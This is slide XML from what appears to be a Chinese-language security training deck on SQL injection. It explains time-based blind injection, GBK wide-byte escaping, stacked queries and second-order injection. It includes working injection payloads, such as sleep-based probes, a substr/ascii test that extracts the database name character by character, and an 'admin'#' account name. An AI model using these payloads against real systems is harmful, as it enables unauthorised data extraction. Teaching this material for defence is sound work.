              <a:t>)  //BENCHMARK()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数重复 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>次执行表达式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。它可以被用于计算 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>处理表达式的速度。结果值通常为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>if(expr1,expr2,expr3)  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>条件语句，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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true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expr2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的值，如果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false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expr3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>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1050" y="7660511"/>
            <a:ext cx="8077200" cy="5214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、判断是否存在延时注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ?id=1' and sleep(10) --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>如图所示，观察请求的时间线，大概在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>秒以上，说明构造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sleep(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>语句起作用，可以把这个时间线作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>注入的判断依据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>、获取数据库名字</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ?id=1' and if(ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(database(),1,1))= 115,sleep(5),0) --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其他操作和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注同理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>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8168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当某字符的大小为一个字节时，称其字符为窄字节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当某字符的大小为两个字节时，称其字符为宽字节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所有英文默认占一个字节，汉字占两个字节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常见的宽字节编码：GB2312,GBK,GB18030,BIG5,Shift_JIS等</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sz="2800">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>宽字节是相对于ascII这样单字节而言的；像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节，实际上只有两字节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sz="2800">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>GBK 是一种多字符的编码，通常来说，一个 gbk 编码汉字，占用2个字节。一个 utf-8 编码的汉字，占用3个字节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latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>宽字节注入指的是 mysql 数据库在使用宽字节（GBK）编码时，会认为两个字符是一个汉字（前一个ascii码要大于128（比如%df），才到汉字的范围），而且当我们输入单引号时，mysql会调用转义函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（常见转义函数有addslashes、mysql_real_escape_string、mysql_escape_string）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，将单引号变为'，其中\的十六进制是%5c,mysql的GBK编码，会认为%df%5c是一个宽字节，也就是'運'，从而使单引号闭合（逃逸），进行注入攻击。</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541073"/>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堆叠查询也叫堆叠注入，在</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中，分号（</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）是用来表示一条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语句的结束。试想一下我们在 </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结束一个</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语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而</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（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。虽然我们前面提到了堆叠查询可以执行任意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句，但是这种注入方式并不是十分的完美的。在我们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统中，因为代码通常只返回一个查询结果，因此，堆叠注入第二个语句产生错误或者结果只能被忽略，我们在前端界面是无法看到返回结果的。如上面的实例如果我们不输出密码那我们是看不到这个结果的。因此，在读取数据时，我们建议使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（联合）注入。同时在使用堆叠注入之前，我们也是需要知道一些数据库相关信息的，例如表名，列名等信息</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971961"/>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mysql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数据库</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语句的默认结束符是以</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号结尾，在执行多条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语句时就要使用结束符隔开</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而堆叠注入其实就是在</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语句结束符的后面再加一条或多条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语句，实现多条语句的执行。因此，堆叠注入的前提是目标未对“</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进行过滤并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可同时执行多条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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局限性：</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堆叠注入受后端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是否支持多语句执行（比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysqli_multi_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数支持多条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句，而与之对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数一次只能执行一条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句），数据库引擎是否支持的限制（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库不支持堆叠注入）</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如果后端只返回一条数据则在前端无法查看到后面堆叠注入语句执行的结果</a:t>
            </a:r>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201972"/>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latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二次注入就是由于将数据存储进数据库中时未做好过滤，先提交构造好的特殊字符请求存储进数据库，然后提交第二次请求时与第一次提交进数据库中的字符发生了作用，形成了一条新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句导致被执行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要原因在于第一次进行数据库插入数据的时候，仅仅只是使用了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者是借助 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>get_magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对其中的特殊字符进行了转义，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有一个特点就是虽然参数在过滤后会添加 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行转义，但是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并不会插入到数据库中，在写入数据库的时候还是保留了原来的数据。在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次进行需要进行查询的时候，直接从数据库中取出了脏数据，没有进行进一步的检验和处理，这样就会造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的二次注入。比如在第一次插入数据的时候，数据中带有单引号，直接插入到了数据库中；然后在下一次使用中在拼凑的过程中，就形成了二次注入。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二阶注入很难通过扫描工具直接扫描出来，最好的发现方法是通过白盒审计。</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14039850" y="6569986"/>
            <a:ext cx="10261958" cy="5812513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038350" y="6569987"/>
            <a:ext cx="11715750" cy="554870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10402848"/>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2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用过程示例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第一步：构造一个带转义字符的语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注册帐户：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin’# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
